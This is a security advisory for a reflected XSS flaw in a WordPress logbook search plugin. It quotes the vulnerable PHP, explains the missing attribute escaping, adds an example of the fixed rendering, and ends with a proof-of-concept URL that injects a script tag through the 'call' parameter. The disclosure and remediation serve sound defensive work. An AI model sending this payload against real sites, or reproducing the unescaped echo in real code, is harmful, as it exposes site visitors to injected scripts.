ADIF Log Search Widget version 1.0e suffers from a cross-site scripting vulnerability.
bf0e8effce0aa1d22148afab86ac617ac9aa5103faece658ec9c15fcadf7e673
# Exploit Title: ADIF Log Search Widget XSS Arbitrary Vulnerability
# Google Dork:
# Date: 26/05/13
# Exploit Author: k3170makan
# Vendor Homepage: http://wordpress.org/plugins/adif-log-search-widget/
# Software Link: http://wordpress.org/plugins/adif-log-search-widget/
# Version: 1.0e
# Tested on: Ubuntu 12.04.2 LTS
The WordPress ADIF Log Search Widget plugin (logbook search widget) suffers from a
reflected cross-site scripting vulnerability.
Code: logbook_search.php (lines 55-58)
-------------------------------------------------------------------------------------------------------------------
echo "
<div id=\"logbook_poplight\" class=\"logbook_poplight\" title=\"$num_rows QSO's with ".$_REQUEST['call']."\">";
echo "<table>";
echo " <tr>";
Code: logbook_search.php (lines 93-102)
-------------------------------------------------------------------------------------------------------------------
else{
    echo "

    <div id=\"logbook_poplight\" class=\"logbook_poplight\" title=\"No QSO's with ".$_REQUEST['call']."\">
    Sorry, nothing found in the logbook!
    </div>
    ";
    logbook_search_form();
}
}
In both branches the code concatenates the "$_REQUEST['call']" value, which arrives
from the widget's HTML search form (via the query string or POST body), straight into
the double-quoted title attribute of a <div> without any escaping. A `"` in the value
closes the attribute and everything after it is rendered as markup, allowing attackers
to inject HTML/JavaScript into a victim's browser session. Escaping the value for the
attribute context (htmlspecialchars() with ENT_QUOTES, or WordPress's esc_attr()) before
echoing it closes the hole.
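The following is an added example, not the plugin's code, that reproduces the unescaped-attribute pattern from both excerpts in a small function and places the hardened version beside it. The function names, the `$call` parameter standing in for `$_REQUEST['call']`, and the sample input are assumptions constructed for this illustration; the input is the URL-decoded form of the PoC payload.

```php
<?php
// Added example (not logbook_search.php): the vulnerable pattern and its fix.
// $call stands in for $_REQUEST['call']; $num_rows mirrors the plugin's variable.

// Vulnerable pattern: the request value is concatenated straight into a
// double-quoted HTML attribute, so a `"` in the input closes the attribute
// and the rest of the value is parsed as markup.
function render_vulnerable(int $num_rows, string $call): string {
    return "<div id=\"logbook_poplight\" class=\"logbook_poplight\" "
         . "title=\"$num_rows QSO's with " . $call . "\">";
}

// Hardened version: escape for the HTML attribute context. ENT_QUOTES makes
// htmlspecialchars() encode both " and ' (and <, >, & as always), so the value
// can no longer terminate the attribute or open a new element.
function esc_attr_value(string $value): string {
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

function render_hardened(int $num_rows, string $call): string {
    return "<div id=\"logbook_poplight\" class=\"logbook_poplight\" "
         . "title=\"$num_rows QSO's with " . esc_attr_value($call) . "\">";
}

// Constructed input: the advisory's PoC payload after URL decoding.
$call = '"><script>alert(1);</script><textarea>';

// Vulnerable output: the title attribute is closed after `with ` and a
// <script> element lands in the page body.
echo "vulnerable: " . render_vulnerable(0, $call) . PHP_EOL;

// Hardened output: the payload is rendered as inert attribute text,
// i.e. title="0 QSO's with &quot;&gt;&lt;script&gt;alert(1);&lt;/script&gt;&lt;textarea&gt;"
echo "hardened:   " . render_hardened(0, $call) . PHP_EOL;

// Regression check: the hardened markup must never contain the raw tag.
if (strpos(render_hardened(0, $call), '<script>') !== false) {
    throw new RuntimeException('attribute escaping failed');
}
```

Inside a WordPress plugin, esc_attr() performs the same attribute-context escaping and esc_html() is the counterpart for text between tags; the point is that the escaping function must match the context the value is written into, and that it is applied at output time in every branch that echoes the value, not just the one that happened to be noticed first.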
PoC:
http://[domain]/wordpress/?call=%22%3E%3Cscript%3Ealert(1);%3C/script%3E%3Ctextarea%3E
--
<k3170makan
blog="http://blog.k3170makan.com"
src ="https://github.com/k3170makan"
tweets="https://twitter.com/k3170makan"
/>